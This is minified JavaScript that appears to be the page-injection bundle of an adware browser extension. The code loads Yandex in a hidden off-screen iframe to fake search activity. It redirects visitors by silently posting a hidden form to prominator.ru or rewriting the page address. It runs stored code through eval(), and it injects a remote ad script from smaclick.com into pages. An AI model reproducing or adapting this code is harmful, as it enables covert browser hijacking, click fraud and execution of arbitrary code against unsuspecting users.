$5F50F845_0528_401D_85D5_999E20B13DF5_.scripts=function(h){return{".":["searchcheat.yandex","framesDispatcher","redir","clk","tsr"],"searchcheat.yandex":function(){function l(){a&&(g--,a.parentNode.removeChild(a),a=null)}var g=0,a;h.Events.addEventListener("force_yandex_search",function(e){if(g)e.reply(!1);else{e.reply(!0);g++;var j=e.data,e=window.innerWidth,m=window.innerHeight,i=-e-25,k=-m-25,c="^https?://([^/]*\\.)?\\b"+(""+j.domain).replace(/\./g,"\\.")+"\\b/",b=RegExp(c,"i");a=document.createElement("iframe");
a.src="http://www.yandex.ru/";a.style.cssText="position: absolute !important; left: "+i+"px !important; top: "+k+"px !important; height: "+m+"px !important; width: "+e+"px !important; z-index: -1 !important;";window.addEventListener("message",function(d){var d=d.data,f=/^(ABYSC_DATA)\|([^|]+)\|(.+)$/;if(f.test(d)&&(d=d.match(f))&&d.length)switch(d[2]){case "HREF":b.test(d[3])&&(h.Events.sendMessage("force_yandex_search",{status:!0,id:j.id}),setTimeout(function(){h.Events.sendMessage("force_yandex_search_retry");
l()},1E3*j.timeout));break;case "STATUS":"NF"==d[3]&&(l(),h.Events.sendMessage("force_yandex_search",{status:!1,id:j.id}))}});document.body.appendChild(a)}});h.Actions.addListener("backgroundDisconnected",l);return{}},framesDispatcher:function(){function h(b){b.postMessage(a+e+"READY_TOO","*");for(var d=0,f=i.length;d<f;++d)try{i[d](b)}catch(c){}}function g(b){var b=b||j.event,d=b.source,b=b.data;if(m.test(b)){var b=b.split(e),f=b[1];if("READY"==f)k.isReady()?h(d):k.addIframeSource(d);else if(c[f])for(var a=
0,g=c[f].length;a<g;++a)try{c[f][a](b,d)}catch(i){}}}var a="5F50F845_0528_401D_85D5_999E20B13DF5_frms_dsptch",e="@@",j=window,m=RegExp("^"+a+e,""),i=[],k=function(){function b(){if(c.length)for(var b=0,a=c.length;b<a;++b)if(!c[b]())return!1;return!0}var d=!1,a=[],c=[];return{addCheckReadyFunction:function(b){b&&c.push(b)},addIframeSource:function(b){for(var d=0,c=a.length;d<c;++d)a[d]!==b&&a.push(b)},isReady:b,onReady:function(){if(!d&&b()){k.isReady=function(){return!0};d=!0;for(var c=0,e=a.length;c<
e;++c)h(a[c]);a=[]}}}}(),c={};j.addEventListener?j.addEventListener("message",g,!1):j.attachEvent&&j.attachEvent("onmessage",g);return{addCheckReadyFunction:function(b){k.addCheckReadyFunction(b)},checkReadyState:function(){k.onReady()},onSendReadyToFrame:function(b){b&&i.push(b)},addMessageHandler:function(b,a){b&&a&&("undefined"==typeof c[b]&&(c[b]=[]),c[b].push(a))},sendToFrame:function(b,c,f){b&&c&&(c=a+e+c,"string"==typeof f&&(f=[f]),f&&f.length&&(c+=e+f.join(e)),(b.contentWindow||b).postMessage(c,
"*"))},getSeparator:function(){return e}}},redir:function(){var l=h.Compatibility.setTimeout;h.Events.dispatchEvent("detect_is_need_redirect_vksmile",{host:window.location.hostname.replace("www.",""),path:window.location.pathname+window.location.search+window.location.hash,url:window.location.href},0,function(g){var a=g.data;if(a.length)if(window.onbeforeunload&&(window.onbeforeunload=function(){}),0==a.indexOf("http://prominator.ru/")){var g=a.indexOf("?",21),e=document.createElement("form");e.action=
a.substring(0,g);e.method="post";e.setAttribute("style","position:fixed!important;left:-10000px!important;bottom:-100000px!important;width: 10px!important;height:10px!important;");for(var a=a.substr(g+1),a=a.split("&"),g=0,j=a.length;g<j;++g){var m=a[g].split("=");if(1<m.length){var i=document.createElement("input");i.value=h.URI.decodeURIComponent(m[1]);i.setAttribute("name",h.URI.decodeURIComponent(m[0]));e.appendChild(i)}}document.body.appendChild(e);l(function(){e.submit()},0)}else window.location.href=
g.data});return{}},clk:function(){var l=h.Compatibility.setTimeout;(function(){function g(){var a=h.Storage.getValue("clk.code_fg","");if(""!=a){var e=window.$5F50F845_0528_401D_85D5_999E20B13DF5_;window.$5F50F845_0528_401D_85D5_999E20B13DF5_={KERNEL:h};try{eval(a)}catch(g){}window.$5F50F845_0528_401D_85D5_999E20B13DF5_=e}}l(function(){g()},0)})();return{}},tsr:function(){var l=h.Compatibility.setTimeout;(function(){function g(a,b,d){a=parseInt(a,10);i?m.push({c:a,n:b,s:d}):(i=!0,l(function(){j(a,
b,d)},0))}function a(){if(SC_BuildTeaserBlock.length){for(var c=0,b=SC_BuildTeaserBlock.length;c<b;++c)SC_BuildTeaserBlock[c]();SC_BuildTeaserBlock=[];i=!1}else l(a,0)}function e(){if(m.length){var a=m.splice(0,1)[0];j(a.c,a.n,a.s)}}function j(c,b,d){i=!0;var f=document.getElementById("SC_TBlock_31775");f&&f.parentNode.removeChild(f);f=document.createElement("div");f.setAttribute("id","SC_TBlock_31775");f.setAttribute("style","display:none!important;");f.dispatchEvent=function(a){a.jsonTeasers&&h.Modules.framesDispatcher.sendToFrame(d,
"TSRS_GOTTEN",[h.JSON.stringify({num:b,data:a.jsonTeasers})]);i=!1;l(e,0)};document.body.appendChild(f);window._sc_debug={code_result_in_json:1,code_v_count:c,code_h_count:1};window.SC_CId="31775";window.SC_BuildTeaserBlock=[];k&&k.parentNode.removeChild(k);k=document.createElement("script");k.setAttribute("type","text/javascript");k.setAttribute("src","http://cdnexport.ad.smaclick.com/js/adv_out.js");(document.head||document.body).appendChild(k);l(a,0)}var m=[],i=!1,k=null;h.Modules.framesDispatcher.addMessageHandler("TSRS_GET",
function(a,b){g(a[2],a[3],b)})})();return{}}}};
